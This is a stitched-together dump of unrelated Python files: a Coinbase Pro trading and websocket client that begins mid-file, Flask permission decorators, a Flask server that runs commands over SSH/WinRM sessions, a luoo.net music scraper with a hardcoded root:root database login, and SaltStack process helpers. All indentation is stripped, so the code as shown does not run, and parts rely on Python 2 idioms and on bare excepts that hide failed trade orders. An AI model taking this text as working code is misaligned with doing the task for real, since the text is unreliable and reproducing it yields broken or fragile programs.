raise TypeError("The future crypto price is not numeric.")
try:
order = {
"product_id": market,
"type": "limit",
"side": "sell",
"size": self.marketBaseIncrement(market, base_quantity),
"price": future_price,
}
Logger.debug(order)
model = AuthAPI(
self._api_key, self._api_secret, self._api_passphrase, self._api_url
)
return model.authAPI("POST", "orders", order)
except:
return pd.DataFrame()
def cancelOrders(self, market: str = "") -> pd.DataFrame:
"""Cancels an order"""
if not self._isMarketValid(market):
raise ValueError("Coinbase Pro market is invalid.")
try:
model = AuthAPI(
self._api_key, self._api_secret, self._api_passphrase, self._api_url
)
return model.authAPI("DELETE", "orders")
except:
return pd.DataFrame()
def marketBaseIncrement(self, market, amount) -> float:
"""Retrieves the market base increment"""
product = self.authAPI("GET", f"products/{market}")
if "base_increment" not in product:
return amount
base_increment = str(product["base_increment"].values[0])
if "." in str(base_increment):
nb_digits = len(str(base_increment).split(".")[1])
else:
nb_digits = 0
return floor(amount * 10 ** nb_digits) / 10 ** nb_digits
def marketQuoteIncrement(self, market, amount) -> float:
"""Retrieves the market quote increment"""
product = self.authAPI("GET", f"products/{market}")
if "quote_increment" not in product:
return amount
quote_increment = str(product["quote_increment"].values[0])
if "." in str(quote_increment):
nb_digits = len(str(quote_increment).split(".")[1])
else:
nb_digits = 0
return floor(amount * 10 ** nb_digits) / 10 ** nb_digits
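# Worked example of the truncation above (illustrative values): if quote_increment
# is "0.01" then nb_digits is 2, so an amount of 123.456 becomes
# floor(123.456 * 100) / 100 = 123.45; the amount is always rounded down to the
# market's precision, never up.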
def authAPI(self, method: str, uri: str, payload: str = "") -> pd.DataFrame:
"""Initiates a REST API call"""
if not isinstance(method, str):
raise TypeError("Method is not a string.")
if not method in ["DELETE", "GET", "POST"]:
raise TypeError("Method not DELETE, GET or POST.")
if not isinstance(uri, str):
raise TypeError("URI is not a string.")
try:
if method == "DELETE":
resp = requests.delete(self._api_url + uri, auth=self)
elif method == "GET":
resp = requests.get(self._api_url + uri, auth=self)
elif method == "POST":
resp = requests.post(self._api_url + uri, json=payload, auth=self)
if "msg" in resp.json():
resp_message = resp.json()["msg"]
elif "message" in resp.json():
resp_message = resp.json()["message"]
else:
resp_message = ""
if resp.status_code == 401 and (
resp_message == "request timestamp expired"
):
message = f"{method} ({resp.status_code}) {self._api_url}{uri} - {resp_message} (hint: check your system time is using NTP)"
Logger.error(f"Error: {message}")
return {}
elif resp.status_code != 200:
if self.die_on_api_error or resp.status_code == 401:
# disable traceback
sys.tracebacklimit = 0
raise Exception(
f"{method.upper()} ({resp.status_code}) {self._api_url}{uri} - {resp_message}"
)
else:
Logger.error(
f"error: {method.upper()} ({resp.status_code}) {self._api_url}{uri} - {resp_message}"
)
return pd.DataFrame()
resp.raise_for_status()
if isinstance(resp.json(), list):
df = pd.DataFrame.from_dict(resp.json())
return df
else:
df = pd.DataFrame(resp.json(), index=[0])
return df
except requests.ConnectionError as err:
return self.handle_api_error(err, "ConnectionError")
except requests.exceptions.HTTPError as err:
return self.handle_api_error(err, "HTTPError")
except requests.Timeout as err:
return self.handle_api_error(err, "Timeout")
except json.decoder.JSONDecodeError as err:
return self.handle_api_error(err, "JSONDecodeError")
def handle_api_error(self, err: str, reason: str) -> pd.DataFrame:
"""Handle API errors"""
if self.debug:
if self.die_on_api_error:
raise SystemExit(err)
else:
Logger.error(err)
return pd.DataFrame()
else:
if self.die_on_api_error:
raise SystemExit(f"{reason}: {self._api_url}")
else:
Logger.info(f"{reason}: {self._api_url}")
return pd.DataFrame()
class PublicAPI(AuthAPIBase):
def __init__(self) -> None:
# options
self.debug = False
self.die_on_api_error = False
self._api_url = "https://api.pro.coinbase.com/"
def getHistoricalData(
self,
market: str = DEFAULT_MARKET,
# granularity: int = MAX_GRANULARITY,
granularity: Granularity = Granularity.ONE_HOUR,
websocket=None,
iso8601start: str = "",
iso8601end: str = "",
) -> pd.DataFrame:
"""Retrieves historical market data"""
# validates the market is syntactically correct
if not self._isMarketValid(market):
raise TypeError("Coinbase Pro market required.")
# validates granularity is an integer
if not isinstance(granularity.to_integer, int):
raise TypeError("Granularity integer required.")
# validates the granularity is supported by Coinbase Pro
if not granularity.to_integer in SUPPORTED_GRANULARITY:
raise TypeError(
"Granularity options: " + ", ".join(map(str, SUPPORTED_GRANULARITY))
)
# validates the ISO 8601 start date is a string (if provided)
if not isinstance(iso8601start, str):
raise TypeError("ISO8601 start integer as string required.")
# validates the ISO 8601 end date is a string (if provided)
if not isinstance(iso8601end, str):
raise TypeError("ISO8601 end integer as string required.")
using_websocket = False
if websocket is not None:
if websocket.candles is not None:
try:
df = websocket.candles.loc[websocket.candles["market"] == market]
using_websocket = True
except:
pass
if websocket is None or (websocket is not None and using_websocket is False):
if iso8601start != "" and iso8601end == "":
resp = self.authAPI(
"GET",
f"products/{market}/candles?granularity={granularity.to_integer}&start={iso8601start}",
)
elif iso8601start != "" and iso8601end != "":
resp = self.authAPI(
"GET",
f"products/{market}/candles?granularity={granularity.to_integer}&start={iso8601start}&end={iso8601end}",
)
else:
resp = self.authAPI(
"GET", f"products/{market}/candles?granularity={granularity.to_integer}"
)
# convert the API response into a Pandas DataFrame
df = pd.DataFrame(
resp, columns=["epoch", "low", "high", "open", "close", "volume"]
)
# reverse the order of the response with earliest last
df = df.iloc[::-1].reset_index()
try:
freq = FREQUENCY_EQUIVALENTS[SUPPORTED_GRANULARITY.index(granularity.to_integer)]
except:
freq = "D"
# convert the DataFrame into a time series with the date as the index/key
try:
tsidx = pd.DatetimeIndex(
pd.to_datetime(df["epoch"], unit="s"),
dtype="datetime64[ns]",
freq=freq,
)
df.set_index(tsidx, inplace=True)
df = df.drop(columns=["epoch", "index"])
df.index.names = ["ts"]
df["date"] = tsidx
except ValueError:
tsidx = pd.DatetimeIndex(
pd.to_datetime(df["epoch"], unit="s"), dtype="datetime64[ns]"
)
df.set_index(tsidx, inplace=True)
df = df.drop(columns=["epoch", "index"])
df.index.names = ["ts"]
df["date"] = tsidx
df["market"] = market
df["granularity"] = granularity.to_integer
# re-order columns
df = df[
[
"date",
"market",
"granularity",
"low",
"high",
"open",
"close",
"volume",
]
]
return df
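# Usage sketch (assumed market, not from this file):
#   api = PublicAPI()
#   df = api.getHistoricalData("BTC-GBP", Granularity.ONE_HOUR)
# The result is a DataFrame indexed by timestamp ("ts") with date, market,
# granularity, low, high, open, close and volume columns.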
def getTicker(self, market: str = DEFAULT_MARKET, websocket=None) -> tuple:
"""Retrieves the market ticker"""
# validates the market is syntactically correct
if not self._isMarketValid(market):
raise TypeError("Coinbase Pro market required.")
now = datetime.today().strftime("%Y-%m-%d %H:%M:%S")
if websocket is not None and websocket.tickers is not None:
try:
row = websocket.tickers.loc[websocket.tickers["market"] == market]
return (
datetime.strptime(
re.sub(r".0*$", "", str(row["date"].values[0])),
"%Y-%m-%dT%H:%M:%S",
).strftime("%Y-%m-%d %H:%M:%S"),
float(row["price"].values[0]),
)
except:
return (now, 0.0)
resp = self.authAPI("GET", f"products/{market}/ticker")
if "time" in resp and "price" in resp:
"""Check if milliseconds (%f) are more then 6 digits. If so truncate for datetime which doesn't support more"""
if len(resp["time"].split('.')[1]) > 7: resp["time"]=resp["time"][:26] + 'Z'
return (
datetime.strptime(resp["time"], "%Y-%m-%dT%H:%M:%S.%fZ").strftime(
"%Y-%m-%d %H:%M:%S"
),
float(resp["price"]),
)
return (now, 0.0)
def getTime(self) -> datetime:
"""Retrieves the exchange time"""
try:
resp = self.authAPI("GET", "time")
if "epoch" in resp:
epoch = int(resp["epoch"])
return datetime.fromtimestamp(epoch)
else:
Logger.error(
"resp does not contain the epoch key for some reason!"
) # remove this later
Logger.error(resp)
return None
except Exception as e:
Logger.error(f"Error: {e}")
return None
def getMarkets24HrStats(self) -> pd.DataFrame:
"""Retrieves exchange markets 24hr stats"""
try:
return self.authAPI("GET", "products/stats")
except:
return pd.DataFrame()
def authAPI(self, method: str, uri: str, payload: str = "") -> dict:
"""Initiates a REST API call"""
if not isinstance(method, str):
raise TypeError("Method is not a string.")
if not method in ["GET", "POST"]:
raise TypeError("Method not GET or POST.")
if not isinstance(uri, str):
raise TypeError("URI is not a string.")
try:
if method == "GET":
resp = requests.get(self._api_url + uri)
elif method == "POST":
resp = requests.post(self._api_url + uri, json=payload)
if resp.status_code != 200:
resp_message = resp.json()["message"]
message = f"{method} ({resp.status_code}) {self._api_url}{uri} - {resp_message}"
if self.die_on_api_error:
raise Exception(message)
else:
Logger.error(f"Error: {message}")
return {}
resp.raise_for_status()
return resp.json()
except requests.ConnectionError as err:
Logger.error("requests.ConnectionError") # remove this later
return self.handle_api_error(err, "ConnectionError")
except requests.exceptions.HTTPError as err:
Logger.error("requests.exceptions.HTTPError") # remove this later
return self.handle_api_error(err, "HTTPError")
except requests.Timeout as err:
Logger.error("requests.Timeout") # remove this later
return self.handle_api_error(err, "Timeout")
except json.decoder.JSONDecodeError as err:
Logger.error("json.decoder.JSONDecodeError") # remove this later
return self.handle_api_error(err, "JSONDecodeError")
def handle_api_error(self, err: str, reason: str) -> dict:
"""Handle API errors"""
if self.debug:
if self.die_on_api_error:
raise SystemExit(err)
else:
Logger.error(err)
return {}
else:
if self.die_on_api_error:
raise SystemExit(f"{reason}: {self._api_url}")
else:
Logger.info(f"{reason}: {self._api_url}")
return {}
class WebSocket(AuthAPIBase):
def __init__(
self,
markets=None,
# granularity=None,
granularity: Granularity = Granularity.ONE_HOUR,
api_url="https://api.pro.coinbase.com",
ws_url="wss://ws-feed.pro.coinbase.com",
) -> None:
# options
self.debug = False
valid_urls = [
"https://api.pro.coinbase.com",
"https://api.pro.coinbase.com/",
"https://public.sandbox.pro.coinbase.com",
"https://public.sandbox.pro.coinbase.com/",
]
# validate Coinbase Pro API
if api_url not in valid_urls:
raise ValueError("Coinbase Pro API URL is invalid")
if api_url[-1] != "/":
api_url = api_url + "/"
valid_ws_urls = [
"wss://ws-feed.pro.coinbase.com",
"wss://ws-feed.pro.coinbase.com/",
]
# validate Coinbase Pro Websocket URL
if ws_url not in valid_ws_urls:
raise ValueError("Coinbase Pro WebSocket URL is invalid")
if ws_url[-1] != "/":
ws_url = ws_url + "/"
self._ws_url = ws_url
self._api_url = api_url
self.markets = markets
self.granularity = granularity
self.type = "subscribe"
self.stop = True
self.error = None
self.ws = None
self.thread = None
self.start_time = None
self.time_elapsed = 0
def start(self):
def _go():
self._connect()
self._listen()
self._disconnect()
self.stop = False
self.on_open()
self.thread = Thread(target=_go)
self.keepalive = Thread(target=self._keepalive)
self.thread.start()
def _connect(self):
if self.markets is None:
print("Error: no market specified!")
sys.exit()
elif not isinstance(self.markets, list):
self.markets = [self.markets]
self.ws = create_connection(self._ws_url)
self.ws.send(
json.dumps(
{
"type": "subscribe",
"product_ids": self.markets,
"channels": ["matches"],
}
)
)
self.start_time = datetime.now()
def _keepalive(self, interval=30):
while self.ws.connected:
self.ws.ping("keepalive")
time.sleep(interval)
def _listen(self):
self.keepalive.start()
while not self.stop:
try:
data = self.ws.recv()
if data != "":
msg = json.loads(data)
else:
msg = {}
except ValueError as e:
self.on_error(e)
except Exception as e:
self.on_error(e)
else:
self.on_message(msg)
def _disconnect(self):
try:
if self.ws:
self.ws.close()
except WebSocketConnectionClosedException:
pass
finally:
self.keepalive.join()
def close(self):
self.stop = True
self.start_time = None
self.time_elapsed = 0
self._disconnect()
self.thread.join()
def on_open(self):
Logger.info("-- Websocket Subscribed! --")
def on_close(self):
Logger.info("-- Websocket Closed --")
def on_message(self, msg):
Logger.info(msg)
def on_error(self, e, data=None):
Logger.error(e)
Logger.error("{} - data: {}".format(e, data))
self.stop = True
try:
self.ws = None
self.tickers = None
self.candles = None
self.start_time = None
self.time_elapsed = 0
except:
pass
def getStartTime(self) -> datetime:
return self.start_time
def getTimeElapsed(self) -> int:
return self.time_elapsed
class WebSocketClient(WebSocket):
def __init__(
self,
markets: list = [DEFAULT_MARKET],
# granularity: str = DEFAULT_GRANULARITY,
granularity: Granularity = Granularity.ONE_HOUR,
api_url="https://api.pro.coinbase.com/",
ws_url: str = "wss://ws-feed.pro.coinbase.com",
) -> None:
if len(markets) == 0:
raise ValueError("A list of one or more markets is required.")
for market in markets:
# validates the market is syntactically correct
if not self._isMarketValid(market):
raise ValueError("Coinbase Pro market is invalid.")
# validates granularity is an integer
if not isinstance(granularity.to_integer, int):
raise TypeError("Granularity integer required.")
# validates the granularity is supported by Coinbase Pro
if not granularity.to_integer in SUPPORTED_GRANULARITY:
raise TypeError(
"Granularity options: " + ", ".join(map(str, SUPPORTED_GRANULARITY))
)
valid_urls = [
"https://api.pro.coinbase.com",
"https://api.pro.coinbase.com/",
"https://public.sandbox.pro.coinbase.com",
"https://public.sandbox.pro.coinbase.com/",
]
# validate Coinbase Pro API
if api_url not in valid_urls:
raise ValueError("Coinbase Pro API URL is invalid")
if api_url[-1] != "/":
api_url = api_url + "/"
valid_ws_urls = [
"wss://ws-feed.pro.coinbase.com",
"wss://ws-feed.pro.coinbase.com/",
]
# validate Coinbase Pro Websocket URL
if ws_url not in valid_ws_urls:
raise ValueError("Coinbase Pro WebSocket URL is invalid")
if ws_url[-1] != "/":
ws_url = ws_url + "/"
self._ws_url = ws_url
self.markets = markets
self.granularity = granularity
self.tickers = None
self.candles = None
self.start_time = None
self.time_elapsed = 0
def on_open(self):
self.message_count = 0
def on_message(self, msg):
if self.start_time is not None:
self.time_elapsed = round(
(datetime.now() - self.start_time).total_seconds()
)
if "time" in msg and "product_id" in msg and "price" in msg:
# create dataframe from websocket message
df = pd.DataFrame(
columns=["date", "market", "price"],
data=[
[
datetime.strptime(
msg["time"], "%Y-%m-%dT%H:%M:%S.%fZ"
).strftime("%Y-%m-%d %H:%M:%S"),
msg["product_id"],
msg["price"],
]
],
)
# set column types
df["date"] = df["date"].astype("datetime64[ns]")
df["price"] = df["price"].astype("float64")
# form candles
df["candle"] = df["date"].dt.floor(freq=self.granularity.frequency)
# candles dataframe is empty
if self.candles is None:
resp = PublicAPI().getHistoricalData(
df["market"].values[0], self.granularity
)
if len(resp) > 0:
self.candles = resp
else:
# create dataframe from websocket message
self.candles = pd.DataFrame(
columns=[
"date",
"market",
"granularity",
"open",
"high",
"close",
"low",
"volume",
],
data=[
[
df["candle"].values[0],
df["market"].values[0],
self.granularity.to_integer,
df["price"].values[0],
df["price"].values[0],
df["price"].values[0],
df["price"].values[0],
msg["size"],
]
],
)
# candles dataframe contains some data
else:
# check if the current candle exists
candle_exists = (
(self.candles["date"] == df["candle"].values[0])
& (self.candles["market"] == df["market"].values[0])
).any()
if not candle_exists:
# populate historical data via api if it does not exist
if (
len(
self.candles[
self.candles["market"] == df["market"].values[0]
]
)
== 0
):
resp = PublicAPI().getHistoricalData(
df["market"].values[0], self.granularity
)
if len(resp) > 0:
df_new_candle = resp
else:
# create dataframe from websocket message
df_new_candle = pd.DataFrame(
columns=[
"date",
"market",
"granularity",
"open",
"high",
"close",
"low",
"volume",
],
data=[
[
df["candle"].values[0],
df["market"].values[0],
self.granularity.to_integer,
df["price"].values[0],
df["price"].values[0],
df["price"].values[0],
df["price"].values[0],
msg["size"],
]
],
)
else:
df_new_candle = pd.DataFrame(
columns=[
"date",
"market",
"granularity",
"open",
"high",
"close",
"low",
"volume",
],
data=[
[
df["candle"].values[0],
df["market"].values[0],
self.granularity.to_integer,
df["price"].values[0],
df["price"].values[0],
df["price"].values[0],
df["price"].values[0],
msg["size"],
]
],
)
self.candles = self.candles.append(df_new_candle)
else:
candle = self.candles[
(
(self.candles["date"] == df["candle"].values[0])
& (self.candles["market"] == df["market"].values[0])
)
]
# set high on high
if float(df["price"].values[0]) > float(candle.high.values[0]):
self.candles.at[candle.index.values[0], "high"] = df[
"price"
].values[0]
self.candles.at[candle.index.values[0], "close"] = df[
"price"
].values[0]
# set low on low
if float(df["price"].values[0]) < float(candle.low.values[0]):
self.candles.at[candle.index.values[0], "low"] = df[
"price"
].values[0]
# increment candle base volume
self.candles.at[candle.index.values[0], "volume"] = float(
candle["volume"].values[0]
) + float(msg["size"])
# insert first entry
if self.tickers is None and len(df) > 0:
self.tickers = df
# append future entries without duplicates
elif self.tickers is not None and len(df) > 0:
self.tickers = (
pd.concat([self.tickers, df])
.drop_duplicates(subset="market", keep="last")
.reset_index(drop=True)
)
# convert dataframes to a time series
tsidx = pd.DatetimeIndex(
pd.to_datetime(self.tickers["date"]).dt.strftime("%Y-%m-%dT%H:%M:%S.%Z")
)
self.tickers.set_index(tsidx, inplace=True)
self.tickers.index.name = "ts"
tsidx = pd.DatetimeIndex(
pd.to_datetime(self.candles["date"]).dt.strftime("%Y-%m-%dT%H:%M:%S.%Z")
)
self.candles.set_index(tsidx, inplace=True)
self.candles.index.name = "ts"
# set correct column types
self.candles["open"] = self.candles["open"].astype("float64")
self.candles["high"] = self.candles["high"].astype("float64")
self.candles["close"] = self.candles["close"].astype("float64")
self.candles["low"] = self.candles["low"].astype("float64")
self.candles["volume"] = self.candles["volume"].astype("float64")
# keep last 300 candles per market
self.candles = self.candles.groupby("market").tail(300)
# print (f'{msg["time"]} {msg["product_id"]} {msg["price"]}')
# print(json.dumps(msg, indent=4, sort_keys=True))
self.message_count += 1
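# Usage sketch (assumed market, not part of this module): the client keeps the
# latest tick per market in .tickers and a rolling candle history per market in
# .candles (trimmed to the last 300 rows per market above).
#
# ws = WebSocketClient(markets=["BTC-GBP"], granularity=Granularity.ONE_HOUR)
# ws.start()
# ...            # read ws.tickers / ws.candles while the feed is running
# ws.close()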
|
decorators.py
|
# -*- coding: utf-8 -*-
"""
decorators
~~~~~~~~~~~~~~
Decorators definition.
:copyright: (c) 2016 by fengweimin.
:date: 16/8/15
"""
from functools import wraps
from threading import Thread
from flask import abort
from flask_login import current_user
def async_exec(f):
""" Async execution. """
@wraps(f)
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
# https://docs.python.org/3/library/threading.html#threading.Thread.daemon
thr.daemon = True
thr.start()
return wrapper
def auth_permission(f):
""" Check auth permission and other business checking.
:return:
"""
@wraps(f)
def wrapper(*args, **kwargs):
if current_user.is_anonymous:
abort(401)
if current_user.is_rejected:
abort(403)
return f(*args, **kwargs)
return wrapper
def admin_permission(f):
""" Check admin permission and other business checking.
:return:
"""
@wraps(f)
def wrapper(*args, **kwargs):
if current_user.is_anonymous:
abort(401)
if not current_user.is_admin:
abort(403)
return f(*args, **kwargs)
return wrapper
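# Usage sketch (assumed Flask app and view names, not from this module): the
# permission decorators wrap a view below the route decorator, so the check runs
# before the view body on every request.
#
# @app.route('/admin/dashboard')
# @admin_permission
# def dashboard():
#     return 'admins only'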
|
Server.py
|
from flask import Flask, request
from SSH import SSHConnector
from SSHTunnel import SSHTunnelConnector
#from waitress import serve
from WinRM import WinRMConnector
import os
import time
import sys
import threading
import warnings
app = Flask("LIMAN")
connections = {}
@app.route("/new", methods=['POST'])
def new_connection():
# Set Variables for easier access
username = request.values.get("username")
hostname = request.values.get("hostname")
password = request.values.get("password")
connection_type = request.values.get("connection_type")
domain = request.values.get("domain")
fqdn = request.values.get("fqdn")
custom_ip = request.values.get("custom_ip")
port = request.values.get("port")
port = port if port is not None else "5986"
# Validate Inputs.
if username is None or password is None or hostname is None or connection_type is None:
return {"error": "Missing Parameters"}, 400
if connection_type == "winrm":
connector = WinRMConnector(domain=domain, fqdn=fqdn, custom_ip=custom_ip, port=port)
elif connection_type == "ssh":
connector = SSHConnector(port=port)
elif connection_type == "ssh_tunnel":
connector = SSHTunnelConnector(request.values.get("remote_port"))
else:
return {"error": "Unknown Type"}, 404
# Set Credentials
connector.set_credentials(username=username, password=password, hostname=hostname)
# Initialize Connector
connector.init()
# Retrieve Token
token = connector.get_token()
# Store Class
connections[token] = connector
# Simply return token to use
return {"token": token, "ticket_path": connector.get_path()}, 200
@app.route("/run", methods=['POST'])
def execute_command():
command = request.values.get("command")
token = request.values.get("token")
try:
connection = connections[token]
except Exception:
return {"error": "Token Not found"}, 404
return {"output": connection.execute(command)}, 200
@app.route("/stop", methods=['POST'])
def stop_connector():
token = request.values.get("token")
try:
connection = connections[token]
except Exception:
return {"error": "Token Not found"}, 404
connection.close()
del connections[token]
return {"output": "ok"}, 200
@app.route("/verify", methods=['POST'])
def verify_token():
token = request.values.get("token")
try:
connection = connections[token]
except Exception:
return {"error": "Token Not found"}, 404
try:
connection.execute("hostname")
except Exception:
del connections[token]
return {"error": "Kerberos Expired"}, 413
return {"message": "Token working"}, 200
@app.route("/send", methods=['POST'])
def send_file():
token = request.values.get("token")
local_path = request.values.get("local_path")
remote_path = request.values.get("remote_path")
try:
connection = connections[token]
except Exception:
return {"error": "Token Not found"}, 404
try:
flag = connection.send_file(local_path, remote_path)
except Exception as e:
flag = False
if flag is True:
return {"output": "ok"}, 200
else:
return {"output": "no"}, 201
@app.route("/get", methods=['POST'])
def get_file():
token = request.values.get("token")
local_path = request.values.get("local_path")
remote_path = request.values.get("remote_path")
try:
connection = connections[token]
except Exception:
return {"error": "Token Not found"}, 404
try:
flag = connection.get_file(local_path, remote_path)
except Exception as e:
flag = False
if flag is True:
return {"output": "ok"}, 200
else:
return {"output": "no"}, 201
def run():
global connections
while True:
time.sleep(3)
for connection in list(connections):
if not connections[connection].keep_alive():
print("CLOSING " + connection)
try:
sys.stderr = open(os.devnull, 'w')
connections[connection].close()
except Exception as e:
pass
sys.stderr = sys.__stderr__
del connections[connection]
if __name__ == "__main__":
#Clean up old configs and tickets.
os.system("rm /tmp/krb5* 2>/dev/null 1>/dev/null")
thread = threading.Thread(target=run)
thread.start()
#Start
app.run(host='127.0.0.1',threaded=True)
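# --- Illustrative request flow (not part of the original file) ---
# A hypothetical session against the default Flask development address
# (127.0.0.1:5000), shown only to document the expected form parameters;
# hostnames and credentials are placeholders.
#
#   curl -X POST http://127.0.0.1:5000/new \
#        -d username=admin -d password=secret \
#        -d hostname=server01 -d connection_type=ssh -d port=22
#   # -> {"token": "<token>", "ticket_path": "..."}
#
#   curl -X POST http://127.0.0.1:5000/run -d token=<token> -d command=hostname
#   curl -X POST http://127.0.0.1:5000/stop -d token=<token>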
|
GetLuooMp3.py
|
import os
import requests
import time
from bs4 import BeautifulSoup
from faker import Factory
import queue
import threading
from sqlalchemy import Column, String, create_engine
from sqlalchemy import Integer
from sqlalchemy import Text
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
fake = Factory.create()
spider_queue = queue.Queue()
Base = declarative_base()
luoo_site = 'http://www.luoo.net/music/'
luoo_site_mp3 = 'http://luoo-mp3.kssws.ks-cdn.com/low/luoo/radio%s/%s.mp3'
dist = '/Users/huanglei/Desktop/aa/'
headers = {
'Connection': 'keep-alive',
'User-Agent': fake.user_agent()
}
# Initialize the database connection. Format: 'dialect+driver://username:password@host:port/database'
engine = create_engine('mysql+mysqlconnector://root:root@localhost:3306/appserver')
# Create the DBSession class:
DBSession = sessionmaker(bind=engine)
class LuooSpecial(Base):
__tablename__ = "luoo_special"
# create table luoo_special(number int primary key,title varchar(60),cover varchar(256),des text,count int,url varchar(256));
number = Column(Integer(), primary_key=True)
title = Column(String(60))
cover = Column(String(256))
des = Column(Text())
count = Column(Integer())
url = Column(String(256))
class LuooMusic(Base):
__tablename__ = "luoo_music"
# create table luoo_music(_id varchar(60) primary key,number int,special_id int,name varchar(60),local_path varchar(256),url_path varchar(256));
_id = Column(String(60), primary_key=True)
number = Column(Integer())
special_id = Column(Integer())
name = Column(String(60))
local_path = Column(String(256))
url_path = Column(String(256))
def fix_characters(s):
for c in ['<', '>', ':', '"', '/', '\\', '|', '?', '*']:
s = s.replace(c, '')
return s
def spider(vol):
url = luoo_site + vol
print('crawling: ' + url + '\n')
res = requests.get(url)
if res.status_code != 200:
return
title = ''
soup = BeautifulSoup(res.content, 'html.parser')
    titleSoup = soup.find('span', attrs={'class': 'vol-title'})
    if titleSoup is not None:
        title = titleSoup.text
    if len(title) == 0:
        return
    cover = ''
    coverSoup = soup.find('img', attrs={'class': 'vol-cover'})
    if coverSoup is not None:
        cover = coverSoup['src']
    if len(cover) == 0:
        return
desc = soup.find('div', attrs={'class': 'vol-desc'})
track_names = soup.find_all('a', attrs={'class': 'trackname'})
track_count = len(track_names)
tracks = []
for track in track_names:
        # Before vol. 12, track numbers 1-9 are a single digit (e.g. 1-9); from then on they are two digits, zero-padded on the left (e.g. 01-09)
_id = str(int(track.text[:2])) if (int(vol) < 12) else track.text[:2]
_name = fix_characters(track.text[4:])
tracks.append({'id': _id, 'name': _name})
phases = {
'url': url,
        'phase': vol,  # issue number
        'title': title,  # issue title
        'cover': cover,  # issue cover image URL
        'desc': desc,  # issue description
        'track_count': track_count,  # number of tracks
        'tracks': tracks  # track list (track id, track name)
}
# print("phases:", phases)
#spider_queue.put(phases)
download(phases)
def download(phases):
desTag = phases['desc']
des = desTag.text
    # Create a session object:
session = DBSession()
    # Create a new LuooSpecial object:
luoo_special = LuooSpecial(number=phases['phase'], title=phases['title'],
cover=phases['cover'], des=des,
count=phases['track_count'], url=phases['url'])
    # Add it to the session:
session.add(luoo_special)
for track in phases['tracks']:
file_url = luoo_site_mp3 % (phases['phase'], track['id'])
local_file_dict = '%s/%s' % (dist, phases['phase'])
        # Add the track record
luoo_music = LuooMusic(_id=str(phases['phase'] + '-' + str(track['id']) + "-" + str(time.time())),
number=track['id'],
special_id=phases['phase'], name=track['name'],
local_path=local_file_dict, url_path=file_url)
session.add(luoo_music)
# if not os.path.exists(local_file_dict):
# os.makedirs(local_file_dict)
#
# local_file = '%s/%s.%s.mp3' % (local_file_dict, track['id'], track['name'])
# if not os.path.isfile(local_file):
# print('downloading: ' + track['name'])
# res = requests.get(file_url, headers=headers)
# with open(local_file, 'wb') as f:
# f.write(res.content)
# f.close()
# print('done.\n')
# else:
# print('break: ' + track['name'])
    # Commit, i.e. persist to the database:
session.commit()
    # Close the session:
session.close()
def downloadLoop():
print('thread %s is running...' % threading.current_thread().name)
while True:
if (spider_queue.qsize() <= 0):
return
else:
phases = spider_queue.get()
download(phases)
print('thread %s ended.' % threading.current_thread().name)
def saveLuooInfo():
pass
if __name__ == '__main__':
vols = range(1, 10)
for vol in vols:
print(str(vol))
spider(str(vol))
print('thread %s is running...' % threading.current_thread().name)
    t = threading.Thread(target=downloadLoop, name='LoopThread')  # create the thread, specifying target function and thread name
    t.start()  # start the thread
    t.join()  # wait for the thread to finish
print('thread %s ended.' % threading.current_thread().name)
|
process.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
# Import python libs
import logging
import os
import time
import sys
import multiprocessing
import signal
import threading
import Queue
# Import salt libs
import salt.utils
import salt.ext.six as six
log = logging.getLogger(__name__)
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
try:
import systemd.daemon
HAS_PYTHON_SYSTEMD = True
except ImportError:
HAS_PYTHON_SYSTEMD = False
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(os.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
    Since there isn't much use for this class as of right now, this implementation
    only supports daemonized threads and will *not* return results.
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = Queue.Queue(queue_size)
self._workers = []
# create worker threads
for idx in xrange(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put((func, args, kwargs), False)
return True
except Queue.Full:
return False
